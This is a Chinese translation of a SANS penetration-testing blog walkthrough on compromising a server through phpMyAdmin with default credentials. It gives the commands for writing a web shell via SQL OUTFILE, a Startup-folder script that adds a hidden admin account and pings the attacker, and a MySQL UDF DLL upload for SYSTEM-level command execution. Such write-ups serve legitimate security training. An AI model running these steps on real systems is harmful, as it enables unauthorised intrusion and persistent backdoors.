原文地址:
http://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin
$ nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -oA http-enum-results --script=http-enum -iL targets.txt
这个命令以正常速度(-T3)进行全连接扫描(-sT)。web服务器通常运行在端口80, 443, 8000, 8443, 和8080,所以这些端口用来主机发现(-PS),和检查(-p)。相比于-PN选项,我更喜欢-PS选项,因为它给我们更高质量的信息。
我们得到扫描结果:
引用
Nmap scan report for 172.16.105.194
Host is up (0.00083s latency).
PORT STATE SERVICE
80/tcp closed http
443/tcp closed https
8000/tcp closed http-alt
8080/tcp open http-proxy
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
8443/tcp closed https-alt
服务器运行phpMyAdmin,登录到管理员页面。发现管理员使用默认口令。
事实是因为该服务器是一个监控服务器。phpMyAdmin被捆绑到软件安装包中。没有人知道默认安装了phpMyAdmin。
接下来使用sql上传web shell。记住当你在sql中粘贴shell的时候使用"\"来规避"'",否则sql报错。使用下列语法注入了php shell code。
select '[escaped php shell code]' INTO OUTFILE 'c:\\inetpub\\wwwroot\\shell.php';
我喜欢用Laudanum(下载地址:http://sourceforge.net/projects/laudanum/files/)php shell,因为它可以限制IP和需要授权。
运行shell code后,需要了解我的权限。运行
c:\windows\system32\cmd.exe /c whoami"
返回一个"nt authority\network service"低权限账户。
技术1. 写入user开机文件夹。
在
C:\Documents and Settings\All Users\Start Menu\Programs\Startup文件夹中创建一个bash文件,当任何user登录的时候,该文件就会执行。命令行窗口会弹出一瞬间,但是user可能不会注意到。即使注意到,也可能会忽视。
命令如下:
net user timmedin reallyl0ngp@ssw0rd! /add /y
net localgroup administrators timmedin /add
ping -n 1 -w 10 [MyIPaddress]
该该命令创建一个user,添加到本地管理员帐户。/y表示跳过弹出窗口。
平命令用来通知我已经出现user登录了。-n 1选项表示发送一个ping数据包。 -w 10告诉命令在放弃前等待10毫秒。
技术2. 使用sql注入UDF(user-defined function)
首先需要找到插件文件夹,使用如下命令:
select @@plugin_dir
C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
然后上传UDF库
这是一种二进制文件,幸运的是,MYSQL "CHAR()"命令可以用来生成二进制数据。例如"SELECT CHAR(72,69,76,76,79)"会返回"HELLO"。我们可以使用下面python命令来实现转换:
$ python -c "print ','.join([str(x) for x in bytearray(open('lib_mysqludf_sys.dll').read())])"
拷贝粘贴,然后我们可以通过OUTFILE生成我们的文件:
SELECT CHAR(77,90,144,0,3,0,0,0,4,0,0,0,255,255,...) INTO OUTFILE
'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\lib_mysqludf_sys.dll'
FIELDS ESCAPED BY ''
接下来,注册dll:
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
CREATE FUNCTION sys_get RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
CREATE FUNCTION sys_set RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
运行:
SELECT sys_eval('dir') FROM dual
nt authority\system
接下来我们就可以做任何事了,上传Meterpreter shell(通过python和OUTFILE),然后通过sys_exec/sys_eval来执行shell。我们可以创建一个管理员帐户。我们可以开启终端服务,修改防火墙等。